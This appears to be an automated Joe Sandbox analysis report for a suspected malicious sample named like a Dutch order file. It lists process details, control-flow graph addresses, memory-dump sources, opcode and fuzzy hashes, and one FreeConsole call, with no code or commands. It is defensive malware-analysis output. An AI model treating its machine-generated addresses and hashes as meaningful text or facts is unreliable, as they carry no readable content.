                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=1272 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8
                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Reset < >

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:15.7%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                              Total number of Nodes:3
                                                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                                                              execution_graph 16638 7ff847150cc9 16639 7ff847150cd1 FreeConsole 16638->16639 16641 7ff847150d8e 16639->16641

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 0 7ff847152f48-7ff8471804bd 2 7ff8471804bf-7ff8471804c2 0->2 3 7ff8471804f6-7ff8471804f9 0->3 6 7ff8471804c4-7ff8471804d1 call 7ff847172b40 2->6 7 7ff8471804e2-7ff8471804f1 call 7ff847152f70 2->7 4 7ff8471804ff-7ff8471805be call 7ff84715b1f0 call 7ff847150348 3->4 5 7ff8471805d6-7ff8471805f8 3->5 4->5 54 7ff8471805c0-7ff8471805d1 4->54 13 7ff8471805fe-7ff847180638 call 7ff847177b10 5->13 14 7ff8471806d8-7ff8471806e4 5->14 6->7 17 7ff8471804d3-7ff8471804e0 call 7ff847172930 6->17 7->3 25 7ff84718063a-7ff84718064e call 7ff847152f90 13->25 26 7ff847180653-7ff847180674 13->26 17->3 17->7 25->26 30 7ff8471806cd-7ff8471806d6 26->30 30->14 31 7ff847180676-7ff847180679 30->31 33 7ff84718067b-7ff84718068f call 7ff847177cc0 31->33 34 7ff8471806e5-7ff847180740 31->34 43 7ff8471806a5-7ff8471806a7 33->43 44 7ff847180691-7ff8471806a0 call 7ff847177b10 33->44 45 7ff847180747-7ff847180764 call 7ff8471534a8 34->45 46 7ff847180742 call 7ff847152f60 34->46 48 7ff8471806cb 43->48 49 7ff8471806a9-7ff8471806c6 call 7ff847152f90 43->49 44->43 56 7ff84718076a-7ff84718076d 45->56 57 7ff847180903-7ff847180906 45->57 46->45 48->30 49->48 54->5 61 7ff847180773-7ff847180777 56->61 62 7ff847180842-7ff847180858 56->62 59 7ff84718090c-7ff847180917 57->59 60 7ff847180b84-7ff847180b94 57->60 63 7ff84718093c-7ff84718093f 59->63 64 7ff847180919-7ff847180937 59->64 65 7ff847180779-7ff84718077d 61->65 66 7ff847180782-7ff8471807b0 61->66 67 7ff84718085a-7ff8471808e3 call 7ff84715b1e8 call 7ff847150348 62->67 68 7ff847180859 62->68 70 7ff847180b95-7ff847180bb1 63->70 71 7ff847180945-7ff847180953 63->71 74 7ff847180fa5-7ff847180fb3 64->74 65->60 98 7ff8471807cf-7ff84718080a call 7ff847150348 66->98 99 7ff8471807b2-7ff8471807ce call 7ff84715b1e8 66->99 164 7ff8471808fb-7ff8471808fe 67->164 165 7ff8471808e5-7ff8471808f6 67->165 68->67 81 7ff847180bd7-7ff847180bf2 70->81 82 7ff847180bb3-7ff847180bcc call 7ff8471575f0 70->82 75 7ff847180a4c-7ff847180a57 71->75 76 7ff847180959-7ff847180967 71->76 75->60 84 7ff847180a5d-7ff847180a6b 75->84 79 7ff847180969-7ff847180970 76->79 80 7ff847180972 76->80 89 7ff847180974-7ff847180976 79->89 80->89 92 7ff847180c0f-7ff847180c23 81->92 93 7ff847180bf4-7ff847180c02 81->93 82->81 105 7ff847180bce-7ff847180bd2 82->105 86 7ff847180a6d-7ff847180a74 84->86 87 7ff847180a76 84->87 94 7ff847180a78-7ff847180a7a 86->94 87->94 89->75 96 7ff84718097c-7ff847180987 89->96 102 7ff847180c25-7ff847180c33 call 7ff8471714e0 92->102 103 7ff847180c93-7ff847180c97 92->103 108 7ff847180c34-7ff847180c4a 93->108 109 7ff847180c04-7ff847180c09 93->109 94->60 101 7ff847180a80-7ff847180a8b 94->101 96->75 104 7ff84718098d-7ff8471809ba 96->104 98->68 149 7ff84718080c-7ff847180821 98->149 99->98 101->60 111 7ff847180a91-7ff847180aa1 101->111 102->108 113 7ff847180ccc-7ff847180d3e call 7ff8471721e0 103->113 114 7ff847180c99-7ff847180c9c 103->114 140 7ff8471809bc-7ff8471809d5 call 7ff84715b1e8 104->140 141 7ff8471809d7-7ff847180a2b call 7ff847150348 104->141 105->81 117 7ff847180bd4-7ff847180bd5 105->117 108->103 131 7ff847180c4c-7ff847180c54 108->131 109->92 119 7ff847180fa2-7ff847180fa3 109->119 111->60 121 7ff847180aa7-7ff847180b10 call 7ff847150348 111->121 169 7ff847180d70 113->169 170 7ff847180d40-7ff847180d6e call 7ff847177b10 * 2 113->170 123 7ff847180c9e-7ff847180ca8 call 7ff847156c30 114->123 124 7ff847180cc8 114->124 117->81 119->74 179 7ff847180b28-7ff847180b5b call 7ff8471526b8 call 7ff847164360 121->179 180 7ff847180b12-7ff847180b23 121->180 123->113 144 7ff847180caa-7ff847180cb7 call 7ff847173160 123->144 124->113 131->103 138 7ff847180c56-7ff847180c60 call 7ff847156c30 131->138 138->103 159 7ff847180c62-7ff847180c6c call 7ff8471729b0 138->159 140->141 141->179 202 7ff847180a31-7ff847180a47 141->202 144->113 163 7ff847180cb9-7ff847180cc6 call 7ff8471534d0 144->163 149->60 171 7ff847180827-7ff84718083d 149->171 159->103 175 7ff847180c6e-7ff847180c8f call 7ff8471714e0 159->175 163->113 163->124 164->74 165->164 181 7ff847180d72-7ff847180d7f 169->181 170->181 171->60 175->103 204 7ff847180b5d-7ff847180b74 179->204 205 7ff847180b7c-7ff847180b7f 179->205 180->179 184 7ff847180f9f-7ff847180fa0 181->184 185 7ff847180d85-7ff847180d92 call 7ff847172930 181->185 184->119 200 7ff847180d98-7ff847180e43 185->200 201 7ff847180ea0-7ff847180f4b 185->201 200->201 224 7ff847180f4d-7ff847180f61 call 7ff847150348 201->224 225 7ff847180f62-7ff847180f87 201->225 202->179 204->205 205->60 205->74 224->225 225->184 230 7ff847180f89-7ff847180f9a 225->230 230->184
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 0 G$0 G$0 G$0 G$0 G$0 G$0 G$:!G$:!G$:!G$P G$P G$P G$P G$P G
                                                                                                                                                                              • API String ID: 0-2570978510
                                                                                                                                                                              • Opcode ID: 8e6bfba3f1f59f8a0d04423f928acd7a32187628d4613e9d754535197b7b26c8
                                                                                                                                                                              • Instruction ID: 1c5971c8f87905ba2fddf5e28501550b1a343a0076bf4c64131777b2e5ed7eba
                                                                                                                                                                              • Opcode Fuzzy Hash: 8e6bfba3f1f59f8a0d04423f928acd7a32187628d4613e9d754535197b7b26c8
                                                                                                                                                                              • Instruction Fuzzy Hash: D282E031B1CE4A8FEB98EA28905577973D2FF98780F1545BDD04EC7686DE24EC428B90

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 232 7ff847152c45-7ff847152c5e 234 7ff847152c61-7ff847152c77 232->234 236 7ff847152c79-7ff847152c7e 234->236 237 7ff847152c81-7ff847152c97 236->237 239 7ff847152c99-7ff847152c9e 237->239 240 7ff847152ca1-7ff847152cb7 239->240 242 7ff847152cb9-7ff847152ccf 240->242 242->242 243 7ff847152cd1-7ff8471760c5 242->243 247 7ff84717610f call 7ff847156c88 243->247 248 7ff8471760c7-7ff8471760f1 243->248 251 7ff847176114-7ff847176116 247->251 249 7ff8471760f3-7ff84717610d 248->249 249->247 252 7ff84717612b-7ff847176132 251->252 253 7ff847176118-7ff847176126 call 7ff847151760 251->253 254 7ff847176138-7ff847176162 call 7ff847152d70 252->254 255 7ff847176722-7ff847176768 call 7ff847152698 252->255 253->252 261 7ff8471761a9-7ff8471761be 254->261 262 7ff847176164-7ff847176174 call 7ff847152fe0 254->262 261->255 266 7ff8471761c4-7ff8471761ed call 7ff8471714a0 call 7ff847172800 261->266 265 7ff847176179-7ff8471761a8 call 7ff847152fe0 262->265 273 7ff84717623e 266->273 274 7ff8471761ef-7ff847176204 call 7ff847172b40 266->274 275 7ff847176240-7ff847176245 273->275 281 7ff847176206-7ff847176213 call 7ff847172af0 274->281 282 7ff847176215 274->282 277 7ff84717624b-7ff84717624f 275->277 278 7ff8471763b3-7ff8471763b5 275->278 277->278 280 7ff847176255-7ff8471762a1 call 7ff8471714e8 call 7ff847171e48 277->280 283 7ff8471765da-7ff8471765f0 278->283 284 7ff8471763bb-7ff8471763c7 278->284 336 7ff847176312-7ff847176316 280->336 337 7ff8471762a3-7ff8471762a8 280->337 287 7ff84717621a-7ff84717621c 281->287 282->287 293 7ff8471766cb-7ff8471766d7 283->293 294 7ff8471765f6-7ff847176601 call 7ff847172800 283->294 284->283 288 7ff8471763cd-7ff8471763eb call 7ff847152dc8 284->288 287->273 291 7ff84717621e-7ff847176228 call 7ff847172b40 287->291 306 7ff8471763ed-7ff8471763fb call 7ff847152d00 288->306 307 7ff847176400-7ff847176404 288->307 313 7ff84717622a-7ff847176235 call 7ff847172af0 291->313 314 7ff847176237 291->314 295 7ff8471766d9-7ff847176712 call 7ff847171538 call 7ff847152d30 293->295 296 7ff847176714-7ff84717671d call 7ff847152d00 293->296 294->293 308 7ff847176607-7ff84717663b 294->308 295->255 296->255 306->255 309 7ff84717648e-7ff847176492 307->309 310 7ff84717640a-7ff847176417 call 7ff847156c58 307->310 346 7ff84717667e-7ff847176699 call 7ff847150348 308->346 347 7ff84717663d-7ff84717667c 308->347 320 7ff8471764d6-7ff8471764d7 309->320 321 7ff847176494-7ff8471764ab call 7ff8471714e8 call 7ff847171e70 309->321 332 7ff847176419-7ff847176450 call 7ff8471714e8 call 7ff84716f058 310->332 333 7ff847176455-7ff84717648c call 7ff8471714e8 call 7ff84716f058 310->333 324 7ff84717623c 313->324 314->324 327 7ff8471764d9-7ff84717653b 320->327 357 7ff8471764be 321->357 358 7ff8471764ad-7ff8471764bb 321->358 324->275 361 7ff84717653d-7ff8471765b9 call 7ff847150348 327->361 332->320 333->320 351 7ff847176320-7ff847176326 336->351 342 7ff8471762aa-7ff8471762af 337->342 343 7ff847176329-7ff847176330 337->343 342->351 352 7ff8471762b1-7ff8471762b6 342->352 360 7ff847176337-7ff84717637a call 7ff847150348 343->360 347->346 351->343 359 7ff8471762b8-7ff8471762dd 352->359 352->360 357->361 362 7ff8471764c0-7ff8471764c7 357->362 358->357 390 7ff847176300-7ff847176311 359->390 360->390 391 7ff84717637c-7ff847176392 360->391 361->255 400 7ff8471765bf-7ff8471765d5 361->400 362->327 367 7ff8471764c9-7ff8471764d4 362->367 367->320 390->336 391->255 397 7ff847176398-7ff8471763ae 391->397 397->255 400->255
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 0 G$0 G$0 G$P G$P G$P G$P G$P G
                                                                                                                                                                              • API String ID: 0-1893089020
                                                                                                                                                                              • Opcode ID: eb85f3ab1c29dd75cc7b978b8d633175731811b8ba543ad6cb9a00ae15059c66
                                                                                                                                                                              • Instruction ID: 3e051becd12f79d6a5a615e4080d01e185df27d18cf88a7fb6082c1d1e91e009
                                                                                                                                                                              • Opcode Fuzzy Hash: eb85f3ab1c29dd75cc7b978b8d633175731811b8ba543ad6cb9a00ae15059c66
                                                                                                                                                                              • Instruction Fuzzy Hash: A6320231A1CA469FE758FB2C94566B973D2FF98790F44057ED04EC72C3DE28A8468B81

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 578 7ff847152f80-7ff84718160e call 7ff84717da90 582 7ff84718162b 578->582 583 7ff847181610-7ff847181629 578->583 585 7ff84718162d-7ff84718163a call 7ff84717d328 582->585 583->585 587 7ff84718163f-7ff84718164a 585->587 588 7ff84718164c-7ff847181665 587->588 589 7ff84718166a-7ff8471816a0 call 7ff84717d330 587->589 588->589 592 7ff847181667-7ff847181668 588->592 595 7ff8471822ed-7ff8471822f2 589->595 596 7ff8471816a6-7ff8471816b5 589->596 592->589 599 7ff8471822f8-7ff847182305 595->599 600 7ff8471816c0-7ff8471816f1 595->600 597 7ff8471816bb 596->597 598 7ff847182310-7ff847182318 596->598 603 7ff847182859-7ff84718286d 597->603 602 7ff84718231e-7ff847182351 598->602 598->603 599->600 601 7ff84718230b 599->601 607 7ff8471816f6-7ff8471816fe 600->607 608 7ff8471816f3-7ff8471816f4 600->608 601->603 605 7ff84718286e-7ff8471828b3 602->605 606 7ff847182357-7ff84718237e 602->606 621 7ff8471828b5-7ff8471828b7 605->621 614 7ff847182385-7ff847182389 606->614 615 7ff847182380-7ff847182383 606->615 610 7ff847181714-7ff847182293 call 7ff847152808 607->610 611 7ff847181700-7ff84718170f call 7ff847152f90 607->611 608->607 624 7ff8471822cf-7ff8471822d6 610->624 625 7ff847182295-7ff84718229c 610->625 611->610 619 7ff84718238c-7ff84718238f 614->619 615->619 622 7ff847182395-7ff8471823c2 call 7ff8471686d0 call 7ff847168780 619->622 623 7ff847182391-7ff847182393 619->623 621->621 626 7ff8471828b9-7ff8471828c9 call 7ff84717d330 621->626 627 7ff8471823d7-7ff8471823ee 622->627 652 7ff8471823c4-7ff8471823d5 call 7ff847151f58 622->652 623->627 633 7ff8471822d8-7ff8471822e6 call 7ff84717d320 624->633 630 7ff84718229e-7ff8471822b5 625->630 631 7ff8471822c6-7ff8471822cd 625->631 642 7ff8471828d5-7ff8471828da 626->642 627->603 635 7ff8471823f4-7ff8471823f8 627->635 630->633 636 7ff8471822b7-7ff8471822c4 call 7ff84717d320 630->636 631->633 633->595 635->603 640 7ff8471823fe-7ff847182485 635->640 636->598 659 7ff8471824ea-7ff8471824ff 640->659 660 7ff847182487-7ff847182494 640->660 647 7ff8471828dc-7ff8471828e9 642->647 648 7ff8471828cb-7ff8471828d0 call 7ff84717d320 642->648 647->648 651 7ff8471828eb-7ff8471828f4 647->651 648->642 652->627 661 7ff8471827fb-7ff847182800 659->661 660->659 662 7ff847182496-7ff8471824a4 660->662 664 7ff847182806-7ff847182813 661->664 665 7ff847182504-7ff84718250e 661->665 662->605 663 7ff8471824aa-7ff8471824b8 662->663 666 7ff8471824ba-7ff8471824c3 call 7ff847152810 663->666 667 7ff8471824c8-7ff8471824e5 call 7ff847152808 663->667 664->665 670 7ff847182819-7ff847182825 664->670 668 7ff84718269e-7ff8471826b1 665->668 669 7ff847182514-7ff847182522 665->669 666->667 667->603 678 7ff8471826b3 668->678 669->668 673 7ff847182528-7ff84718264c call 7ff847171558 * 2 call 7ff8471722f0 669->673 670->605 675 7ff847182827-7ff847182854 call 7ff847152808 670->675 714 7ff84718264e-7ff847182684 call 7ff847177b10 * 2 673->714 715 7ff847182686 673->715 675->603 678->678 680 7ff8471826b5-7ff84718279b call 7ff8471722f0 678->680 705 7ff8471827ce-7ff8471827cf 680->705 706 7ff84718279d-7ff8471827cc call 7ff847177b10 * 2 680->706 709 7ff8471827d1-7ff8471827f6 call 7ff847152808 call 7ff84717d320 705->709 706->709 709->661 720 7ff847182688-7ff847182699 714->720 715->720 720->709
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ($HB$G$HB$G$XQ"G
                                                                                                                                                                              • API String ID: 0-3090959669
                                                                                                                                                                              • Opcode ID: e5ddee613888686683991ef87bb31de8f8b98237f5c9b3c88701bb2d0fdb889f
                                                                                                                                                                              • Instruction ID: ae415fea13dc12698f33f43d8ac5da3a1ed858a864098e903073a6d95560ae0b
                                                                                                                                                                              • Opcode Fuzzy Hash: e5ddee613888686683991ef87bb31de8f8b98237f5c9b3c88701bb2d0fdb889f
                                                                                                                                                                              • Instruction Fuzzy Hash: 3B429370A1CA4A8FEB99EB18D095AB977E1FFA8340F15457ED44EC3296CE34E841CB41
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2167284543.00007FF847260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847260000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847260000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: A
                                                                                                                                                                              • API String ID: 0-3554254475
                                                                                                                                                                              • Opcode ID: 919a7bbc39019bca7fcee34536eff639bc4641fdf8b57f709f9249660562bca4
                                                                                                                                                                              • Instruction ID: 18b64c8936a3eb5f9095b66948623790b4a212b1473869539cfb5d03c1ba3768
                                                                                                                                                                              • Opcode Fuzzy Hash: 919a7bbc39019bca7fcee34536eff639bc4641fdf8b57f709f9249660562bca4
                                                                                                                                                                              • Instruction Fuzzy Hash: 7A03483180DBD98FE766EB2898556A87BE0FF56351F1805FFC08ACB193DA286C46C741
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: fM_H
                                                                                                                                                                              • API String ID: 0-40886633
                                                                                                                                                                              • Opcode ID: 733a00fded5732f7ad6090d19e5f331edc48d0647fbccc49981b2f6f7df70fdc
                                                                                                                                                                              • Instruction ID: 74a8d8f3697ef6a0ab208b67f9b8c45b0196b45e30d076040f06e796ec29d947
                                                                                                                                                                              • Opcode Fuzzy Hash: 733a00fded5732f7ad6090d19e5f331edc48d0647fbccc49981b2f6f7df70fdc
                                                                                                                                                                              • Instruction Fuzzy Hash: F8E2F831A1CD0ACFEB99FA2C945967873E1FF98751B5402B9C44EC7296DE24EC428B81

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 2017 7ff84717b3e8-7ff84717c45d 2019 7ff84717c45f-7ff84717c465 2017->2019 2020 7ff84717c467-7ff84717c473 2017->2020 2021 7ff84717c476-7ff84717c56c call 7ff84717b3e0 call 7ff84717b4a0 2019->2021 2020->2021 2027 7ff84717c572-7ff84717c576 2021->2027 2028 7ff84717c58e-7ff84717c593 2027->2028 2029 7ff84717c578-7ff84717c57a 2027->2029 2031 7ff84717c595-7ff84717c5a4 call 7ff84717b448 2028->2031 2032 7ff84717c5c3-7ff84717c5ca 2028->2032 2029->2028 2030 7ff84717c57c-7ff84717c57f call 7ff84717b450 2029->2030 2040 7ff84717c584-7ff84717c58b 2030->2040 2044 7ff84717c5aa-7ff84717c5be 2031->2044 2045 7ff84717cae4-7ff84717caf5 2031->2045 2033 7ff84717c5cc-7ff84717c5de call 7ff84717b3f0 2032->2033 2034 7ff84717c5e3-7ff84717c5eb 2032->2034 2033->2034 2038 7ff84717c5ed-7ff84717c5f4 2034->2038 2039 7ff84717c623-7ff84717c628 2034->2039 2042 7ff84717c607-7ff84717c60a call 7ff84717b428 2038->2042 2043 7ff84717c5f6-7ff84717c600 call 7ff84717b400 2038->2043 2046 7ff84717c62e-7ff84717c659 2039->2046 2047 7ff84717c716-7ff84717c720 call 7ff84717b4e8 2039->2047 2040->2028 2059 7ff84717c60f-7ff84717c611 2042->2059 2043->2039 2064 7ff84717c602 2043->2064 2044->2032 2050 7ff84717cb07-7ff84717cb18 2045->2050 2051 7ff84717caf7-7ff84717cb02 call 7ff84717b3f0 2045->2051 2046->2047 2048 7ff84717c65f-7ff84717c666 2046->2048 2047->2027 2063 7ff84717c726-7ff84717c730 call 7ff84717b458 2047->2063 2054 7ff84717c70c 2048->2054 2055 7ff84717c66c-7ff84717c677 2048->2055 2051->2050 2066 7ff84717c711 2054->2066 2061 7ff84717c679-7ff84717c68a 2055->2061 2062 7ff84717c690-7ff84717c6b1 2055->2062 2059->2039 2065 7ff84717c613-7ff84717c61d call 7ff84717b430 2059->2065 2061->2054 2061->2062 2062->2066 2071 7ff84717c6b3-7ff84717c6c7 2062->2071 2073 7ff84717c732-7ff84717c73b 2063->2073 2074 7ff84717c740-7ff84717c74d 2063->2074 2064->2027 2065->2027 2065->2039 2066->2027 2075 7ff84717c6c9-7ff84717c6cd 2071->2075 2076 7ff84717c6d3-7ff84717c701 2071->2076 2073->2027 2077 7ff84717c74f-7ff84717c756 2074->2077 2078 7ff84717c780-7ff84717c782 2074->2078 2075->2076 2076->2054 2079 7ff84717c758-7ff84717c764 2077->2079 2080 7ff84717c766-7ff84717c777 call 7ff847179b20 2077->2080 2082 7ff84717c78b 2078->2082 2083 7ff84717c784-7ff84717c789 2078->2083 2079->2080 2085 7ff84717c779-7ff84717c77b 2079->2085 2080->2078 2080->2085 2084 7ff84717c78d-7ff84717c795 2082->2084 2083->2084 2087 7ff84717c7d7-7ff84717c7da call 7ff84717b460 2084->2087 2088 7ff84717c797-7ff84717c79e 2084->2088 2085->2027 2096 7ff84717c7df-7ff84717c7e1 2087->2096 2091 7ff84717c7ae-7ff84717c7bf call 7ff847179b20 2088->2091 2092 7ff84717c7a0-7ff84717c7ac 2088->2092 2094 7ff84717c7d0-7ff84717c7d2 2091->2094 2100 7ff84717c7c1-7ff84717c7ce call 7ff847179b20 2091->2100 2092->2091 2092->2094 2094->2027 2098 7ff84717c7ed-7ff84717c7ef 2096->2098 2099 7ff84717c7e3-7ff84717c7e8 2096->2099 2101 7ff84717c87a-7ff84717c87e 2098->2101 2102 7ff84717c7f5-7ff84717c80f 2098->2102 2099->2027 2100->2087 2100->2094 2106 7ff84717c905-7ff84717c931 2101->2106 2107 7ff84717c884-7ff84717c89a 2101->2107 2103 7ff84717c823-7ff84717c830 2102->2103 2104 7ff84717c811-7ff84717c81d 2102->2104 2108 7ff84717c832-7ff84717c83d 2103->2108 2109 7ff84717c871-7ff84717c878 2103->2109 2104->2103 2115 7ff84717c946-7ff84717c953 2106->2115 2116 7ff84717c933-7ff84717c940 2106->2116 2112 7ff84717c8ae-7ff84717c8bb 2107->2112 2113 7ff84717c89c-7ff84717c8a8 2107->2113 2114 7ff84717c843-7ff84717c86c 2108->2114 2109->2114 2117 7ff84717c8bd-7ff84717c8c8 2112->2117 2118 7ff84717c8fc-7ff84717c903 2112->2118 2113->2112 2131 7ff84717cadd-7ff84717cadf 2114->2131 2120 7ff84717ca3b-7ff84717ca42 2115->2120 2121 7ff84717c959-7ff84717c964 2115->2121 2116->2115 2119 7ff84717c8ce-7ff84717c8f7 2117->2119 2118->2119 2119->2131 2122 7ff84717c96a-7ff84717ca01 2120->2122 2121->2122 2138 7ff84717ca75-7ff84717ca86 2122->2138 2139 7ff84717ca03-7ff84717ca08 2122->2139 2131->2027 2143 7ff84717ca88-7ff84717ca91 2138->2143 2139->2131 2140 7ff84717ca0e-7ff84717ca23 2139->2140 2140->2131 2142 7ff84717ca29-7ff84717ca39 call 7ff847156f80 2140->2142 2142->2143 2146 7ff84717ca47-7ff84717ca4e 2143->2146 2147 7ff84717ca93-7ff84717cac1 call 7ff847152250 2143->2147 2148 7ff84717cb19-7ff84717cb39 2146->2148 2149 7ff84717ca54-7ff84717ca74 2146->2149 2154 7ff84717cac7-7ff84717cacd call 7ff847162d50 2147->2154 2155 7ff84717cac3-7ff84717cac5 2147->2155 2149->2138 2156 7ff84717cacf-7ff84717cad6 2154->2156 2155->2156 2156->2131
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Pp"G
                                                                                                                                                                              • API String ID: 0-4054985469
                                                                                                                                                                              • Opcode ID: 99821fd2796e1697d2b88a6dfc75064433803b6658cc00244285a161647cf272
                                                                                                                                                                              • Instruction ID: a69e56ae3a85d5afacd96deedb2b2bd2b8b274310f6ac6b4c90b1f0e4fa03247
                                                                                                                                                                              • Opcode Fuzzy Hash: 99821fd2796e1697d2b88a6dfc75064433803b6658cc00244285a161647cf272
                                                                                                                                                                              • Instruction Fuzzy Hash: A0423A30A18A4A8FEBA8EF18C495BB973E1FF58340F1041B9D44ED7695DF35A886CB41
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 6fb49cd96a0d9afde8958fce57ff25a4cf2dcae539a53bc2cf29c34127a7ed38
                                                                                                                                                                              • Instruction ID: 459c1371a9225ea3a88c9cfaa0ff21cb34504de4d1d6c1c42aeb8607782ef92b
                                                                                                                                                                              • Opcode Fuzzy Hash: 6fb49cd96a0d9afde8958fce57ff25a4cf2dcae539a53bc2cf29c34127a7ed38
                                                                                                                                                                              • Instruction Fuzzy Hash: B042A331A1CE468FDB98EA28D085A76B3E2FFA4340B14457DD44EC3696DE35F846CB81
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2506e3c68528735827efbce3dfbe0de8e2fc7b871e02070ee3c2ed69c0fa38bb
                                                                                                                                                                              • Instruction ID: 052dd816324d80a0979dbebafee7375b80df22eb450fcf943e4914a8f95dc6f9
                                                                                                                                                                              • Opcode Fuzzy Hash: 2506e3c68528735827efbce3dfbe0de8e2fc7b871e02070ee3c2ed69c0fa38bb
                                                                                                                                                                              • Instruction Fuzzy Hash: 7271C131A0CA4ADFD79CEF3C942967573E1FFAA74471445FEC00AC72A2DE21A9428B41

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 2452 7ff847150cc9-7ff847150ccf 2453 7ff847150cda-7ff847150ceb 2452->2453 2454 7ff847150cd1-7ff847150cd9 2452->2454 2455 7ff847150ced-7ff847150cf5 2453->2455 2456 7ff847150cf6-7ff847150d8c FreeConsole 2453->2456 2454->2453 2455->2456 2460 7ff847150d8e 2456->2460 2461 7ff847150d94-7ff847150dbb 2456->2461 2460->2461
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ConsoleFree
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 771614528-0
